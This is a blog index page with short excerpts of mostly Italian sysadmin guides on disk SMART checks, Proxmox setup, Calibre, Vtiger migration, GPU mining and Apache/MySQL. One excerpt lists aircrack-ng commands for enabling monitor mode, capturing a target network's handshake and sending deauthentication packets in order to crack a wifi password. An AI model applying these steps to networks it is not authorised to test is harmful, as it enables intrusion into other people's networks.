• check disk SMARTCTL

    installazione di smartmontools sudo apt update sudo apt install smartmontools identificare il disco sul quale fare i check lsblk visualizzare lo stato di salute generale sudo smartctl -H /dev/sdX visualizzare tutti i dati S.M.A.R.T. sudo smartctl -a /dev/sdX eseguire test rapido (short) sudo smartctl -t short /dev/sdX  

    Read More

    //

  • Openclaw connessione alla porta 18789 da altro PC su LAN

    Ecco una proposta di guida per il tuo blog WordPress. L’ho strutturata in modo che sia chiara, professionale e facile da seguire, dividendo i passaggi tra server e client. 🚀 Guida: Connettersi alla Web GUI di OpenClaw tramite LAN Se desideri accedere alla dashboard di controllo di OpenClaw da un altro computer della tua rete

    Read More

    //

  • KALIBRE convertire e-book

    Rapida guida per salvare e-book amazon sulla propria libreria kalibre ed eventualmente convertirli in pdf ecc La guida è per sistema windows 1)installare Kalibre 2)installare Kindle application per windows KALIBRE se connetto il lettore e-book al pc posso vedere la libreria presente su di esso. Se provo a scaricare un libro presente sull’e-book all’interno della

    Read More

    //

  • Aircrack how find wifi password

    spegnere wifisudo ifconfig wlan0 down chiudere i processi che danno fastidio al monitor modesudo airmon-ng checksudo airmon-ng check kill avviare monitor modesudo airmon-ng start wlan0 avviare la ricerca degli access pointsudo airodump-ng wlan0mon trovata la rete da craccaresudo airodump-ng –bssid C0:A3:6E:B2:89:04 –channel 13 –write Casa_DAC wlan0mon accelero l’hand-shakesudo airepaly-ng –deauth 1 -a BSSID -c STATION

    Read More

    //

  • Proxmox script post installazione

    PROXMOX PVE questo il link per lo script post-installazione per configurare al meglio repository ecc https://community-scripts.github.io/ProxmoxVE/scripts?id=post-pve-install&category=Proxmox+%26+Virtualization PROXMOX BACKUP SERVER questo il link per lo script post-installazione per configurare al meglio repository ecc https://community-scripts.github.io/ProxmoxVE/scripts?id=post-pbs-install&category=Proxmox+%26+Virtualization

    Read More

    //

  • Mining on Ubuntu with less than 4 Gb Vram on unmineable.com

    For those who want to try mining with Ubuntu (command line) with a card with 4 GB of RAM (in my case it is a GeForce GTX 1650), you can follow this short guide and you will be able to do it. This is my configuration (but I think it can be adapted to any

    Read More

    //

  • Proxmox Backup Client how to install it on Ubuntu 22.04

    download debian file from: http://download.proxmox.com/debian/pbs-client/dists/bullseye/main/ the correct file to choose is: proxmox-backup-client-static_3.4.7-1_amd64.deb  go to the folder where you downloaded it and run it with: sudo apt install ./proxmox-backup-client-static_3.4.7-1_amd64.deb create a hidden folder on your home where you will store the login credentials for the Proxmox Backup Server on which you will save the backups. in

    Read More

    //

  • Proxmox attivare passthrough

    Proxmox versione 9.1.4 GPU nvidia GTX1650 come attivare passthrough Prima fase INSTALLAZIONE DRIVER NVIDIA Seconda fase ATTIVARE passthrough una precisazione. Se intendiamo usare il passthrough su una VM non dobbiamo effettuare il secondo passaggio, in quanto è già tutto attivo. Se vogliamo invece utilizzare il passthrough su un container LXC dobbiamo effettuare il secondo passaggio

    Read More

    //

  • Vtiger 8.4 migration on other hardware

    Presupposti: Vtigercrm funzionante e configurato su server#1 si vuole trasferire su altro server#2 Nel mio caso server#1 e server#2 sono macchine ubuntu 22.04 Sul server#2 che dovrà ospitare il vtigercrm trasferito ho installato la stessa distro ubuntu la stessa versione php 8.1 Su server#2 installa  apache mysql phpmyadmin (non indispensabile se sai usare la riga

    Read More

    //

  • Apache-Mysql-Samba

    Apache sudo apt update sudo apt install apache2 sudo systemctl status apache2 Start: sudo systemctl start apache2 Stop: sudo systemctl stop apache2 Restart: sudo systemctl restart apache2 Reload (config changes): sudo systemctl reload apache2 Enable (start on boot): sudo systemctl enable apache2 Disable (don’t start on boot): sudo systemctl disable apache2      Mysql sudo apt update sudo apt install mysql-serversudo service

    Read More

    //